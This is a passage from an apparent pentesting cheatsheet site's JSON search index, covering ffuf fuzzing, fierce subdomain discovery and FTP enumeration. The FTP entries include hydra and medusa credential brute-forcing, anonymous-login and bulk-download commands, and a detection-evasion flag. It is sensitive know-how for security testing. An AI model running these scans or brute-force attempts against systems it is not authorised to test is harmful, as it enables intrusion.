JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results.json -of json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save all formats\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results -of all\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-wordlists\"\u003eRecommended Wordlists\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Directories\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/common.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Virtual hosts / subdomains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Parameters\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Passwords\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"example-full-runs\"\u003eExample Full Runs\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Directory + extension scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://example.com/FUZZ \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -e .php,.html,.txt,.bak \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -ac -c -v \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -o ffuf_dir.json -of json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Virtual host discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -ac -c \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -o ffuf_vhost.json -of json\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"ffuf"},{"content":"fierce Cheatsheet Type: User-friendly recursive subdomain discovery with wildcard detection\nInstallation sudo apt install fierce # or pip3 install fierce # or git clone https://github.com/mschwager/fierce.git Basic Usage fierce --domain \u0026lt;domain\u0026gt; fierce --domain example.com Common Flags Flag Description --domain \u0026lt;domain\u0026gt; Target domain --wordlist \u0026lt;file\u0026gt; Custom wordlist for brute forcing --dns-servers \u0026lt;ns\u0026gt; Use specific DNS servers (space-separated) --delay \u0026lt;seconds\u0026gt; Delay between requests --subdomains \u0026lt;list\u0026gt; Manually specify subdomains to check --wide Scan entire Class C of discovered hosts --traverse \u0026lt;n\u0026gt; Scan IPs n away from discovered hosts --search \u0026lt;domains\u0026gt; Filter results by domain pattern --range \u0026lt;cidr\u0026gt; Scan an IP range for PTR records --connect Attempt HTTP/HTTPS connections to found hosts --output \u0026lt;file\u0026gt; Save results to JSON file Common Commands # Basic scan (uses built-in wordlist) fierce --domain example.com # Custom wordlist fierce --domain example.com \\ --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt # Use specific DNS server fierce --domain example.com --dns-servers 8.8.8.8 # Wide scan (scan Class C of discovered IPs) fierce --domain example.com --wide # Add delay to evade detection fierce --domain example.com --delay 3 # Traverse IPs near discovered hosts fierce --domain example.com --traverse 5 # Check HTTP/HTTPS on found hosts fierce --domain example.com --connect # Save to JSON fierce --domain example.com --output results.json # Scan IP range for reverse DNS fierce --range 192.168.1.0/24 Key Features - Wildcard detection (avoids false positives from wildcard DNS) - Recursive: checks subdomains of subdomains - Identifies adjacent IPs in same IP space - Clean, readable output format - Built-in default wordlist Wildcard Detection Fierce automatically detects wildcard DNS entries. If a domain resolves all queries (e.g., *.example.com → same IP), fierce identifies this and handles it gracefully instead of reporting false positives.\nRecommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt /usr/share/wordlists/dnsmap.txt Example Full Run fierce --domain example.com \\ --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ --dns-servers 8.8.8.8 \\ --connect \\ --output fierce_results.json ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/fierce/","summary":"\u003ch1 id=\"fierce-cheatsheet\"\u003efierce Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e User-friendly recursive subdomain discovery with wildcard detection\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install fierce\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epip3 install fierce\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egit clone https://github.com/mschwager/fierce.git\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--domain \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget domain\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wordlist \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom wordlist for brute forcing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--dns-servers \u0026lt;ns\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse specific DNS servers (space-separated)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--delay \u0026lt;seconds\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDelay between requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--subdomains \u0026lt;list\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eManually specify subdomains to check\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wide\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eScan entire Class C of discovered hosts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--traverse \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eScan IPs n away from discovered hosts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--search \u0026lt;domains\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter results by domain pattern\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--range \u0026lt;cidr\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eScan an IP range for PTR records\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--connect\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAttempt HTTP/HTTPS connections to found hosts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--output \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave results to JSON file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic scan (uses built-in wordlist)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom wordlist\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use specific DNS server\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --dns-servers 8.8.8.8\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Wide scan (scan Class C of discovered IPs)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --wide\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Add delay to evade detection\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --delay \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Traverse IPs near discovered hosts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --traverse \u003cspan style=\"color:#ae81ff\"\u003e5\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Check HTTP/HTTPS on found hosts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --connect\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save to JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --domain example.com --output results.json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scan IP range for reverse DNS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efierce --range 192.168.1.0/24\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-features\"\u003eKey Features\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e- Wildcard detection (avoids false positives from wildcard DNS)\n- Recursive: checks subdomains of subdomains\n- Identifies adjacent IPs in same IP space\n- Clean, readable output format\n- Built-in default wordlist\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"wildcard-detection\"\u003eWildcard Detection\u003c/h2\u003e\n\u003cp\u003eFierce automatically detects wildcard DNS entries. If a domain resolves all queries (e.g., \u003ccode\u003e*.example.com\u003c/code\u003e → same IP), fierce identifies this and handles it gracefully instead of reporting false positives.\u003c/p\u003e","title":"fierce"},{"content":"FTP Enumeration Cheatsheet Default Ports: 21 (control), 20 (data - active mode)\nBanner Grabbing \u0026amp; Connection nc -nv \u0026lt;ip\u0026gt; 21 telnet \u0026lt;ip\u0026gt; 21 ftp \u0026lt;ip\u0026gt; openssl s_client -connect \u0026lt;ip\u0026gt;:21 -starttls ftp # FTPS Anonymous Login ftp \u0026lt;ip\u0026gt; # Username: anonymous # Password: anonymous (or leave blank) # Via curl curl -v ftp://\u0026lt;ip\u0026gt;/ --user anonymous:anonymous curl -v ftp://\u0026lt;ip\u0026gt;/\u0026lt;path\u0026gt;/ --user anonymous:anonymous FTP Commands (Once Connected) USER \u0026lt;username\u0026gt; # Send username PASS \u0026lt;password\u0026gt; # Send password SYST # Display system type STAT # Status / verbose file listing LIST # List files (verbose) NLST # Name list (simple) PWD # Print working directory CWD \u0026lt;dir\u0026gt; # Change directory GET \u0026lt;file\u0026gt; # Download file PUT \u0026lt;file\u0026gt; # Upload file MGET * # Download all files BINARY # Switch to binary transfer mode ASCII # Switch to ASCII transfer mode PASV # Enter passive mode QUIT # Disconnect Nmap FTP Scripts nmap -p 21 --script ftp-anon \u0026lt;ip\u0026gt; # Check anonymous login nmap -p 21 --script ftp-banner \u0026lt;ip\u0026gt; # Banner grab nmap -p 21 --script ftp-brute \u0026lt;ip\u0026gt; # Brute force credentials nmap -p 21 --script ftp-bounce \u0026lt;ip\u0026gt; # FTP bounce attack check nmap -p 21 --script ftp-syst \u0026lt;ip\u0026gt; # SYST command response nmap -p 21 --script ftp-vsftpd-backdoor \u0026lt;ip\u0026gt; # vsFTPd 2.3.4 backdoor check nmap -p 21 -sV --script ftp-* \u0026lt;ip\u0026gt; # Run all FTP scripts Brute Force hydra -l \u0026lt;user\u0026gt; -P wordlist.txt ftp://\u0026lt;ip\u0026gt; hydra -L users.txt -P wordlist.txt ftp://\u0026lt;ip\u0026gt; medusa -u \u0026lt;user\u0026gt; -P wordlist.txt -h \u0026lt;ip\u0026gt; -M ftp Bulk Download # wget recursive download (no passive mode) wget -m --no-passive ftp://anonymous:anonymous@\u0026lt;ip\u0026gt; # curl recursive curl -s ftp://\u0026lt;ip\u0026gt;/ --user anonymous:anonymous | awk \u0026#39;{print $NF}\u0026#39; | \\ while read f; do curl -s ftp://\u0026lt;ip\u0026gt;/$f --user anonymous:anonymous -O; done Key Vulnerabilities Software CVE Description vsFTPd 2.3.4 CVE-2011-2523 Backdoor shell on port 6200 ProFTPd 1.3.5 CVE-2015-3306 mod_copy unauthenticated file copy ProFTPd 1.3.3c CVE-2010-4221 Remote heap overflow ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/ftp/","summary":"\u003ch1 id=\"ftp-enumeration-cheatsheet\"\u003eFTP Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 21 (control), 20 (data - active mode)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner-grabbing--connection\"\u003eBanner Grabbing \u0026amp; Connection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003etelnet \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eftp \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect \u0026lt;ip\u0026gt;:21 -starttls ftp \u003cspan style=\"color:#75715e\"\u003e# FTPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"anonymous-login\"\u003eAnonymous Login\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eftp \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Username: anonymous\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Password: anonymous (or leave blank)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Via curl\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v ftp://\u0026lt;ip\u0026gt;/ --user anonymous:anonymous\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v ftp://\u0026lt;ip\u0026gt;/\u0026lt;path\u0026gt;/ --user anonymous:anonymous\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ftp-commands-once-connected\"\u003eFTP Commands (Once Connected)\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eUSER \u0026lt;username\u0026gt; # Send username\nPASS \u0026lt;password\u0026gt; # Send password\nSYST # Display system type\nSTAT # Status / verbose file listing\nLIST # List files (verbose)\nNLST # Name list (simple)\nPWD # Print working directory\nCWD \u0026lt;dir\u0026gt; # Change directory\nGET \u0026lt;file\u0026gt; # Download file\nPUT \u0026lt;file\u0026gt; # Upload file\nMGET * # Download all files\nBINARY # Switch to binary transfer mode\nASCII # Switch to ASCII transfer mode\nPASV # Enter passive mode\nQUIT # Disconnect\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-ftp-scripts\"\u003eNmap FTP Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-anon \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Check anonymous login\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-banner \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Banner grab\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-brute \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Brute force credentials\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-bounce \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# FTP bounce attack check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-syst \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# SYST command response\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-vsftpd-backdoor \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# vsFTPd 2.3.4 backdoor check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e -sV --script ftp-* \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Run all FTP scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre 